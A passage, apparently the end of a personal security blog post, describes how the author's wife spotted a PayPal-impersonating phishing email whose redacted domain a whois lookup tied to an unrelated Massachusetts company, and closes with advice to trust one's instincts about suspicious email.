The phisher used a domain name pp-redacted-.com which based on a whois look up doesn't have anything to do with PayPal. It belongs to an instrumentation company out of Massachusetts that happens to have similar initials as PayPal.
While my wife isn't a security professional or an expert with computers, her education to not trust every email in her inbox (beyond spam) triggered a gut feeling to think more clearly.

If it doesn't feel right, then it's not. Go with your gut!
Until next time, stay safe and secure online.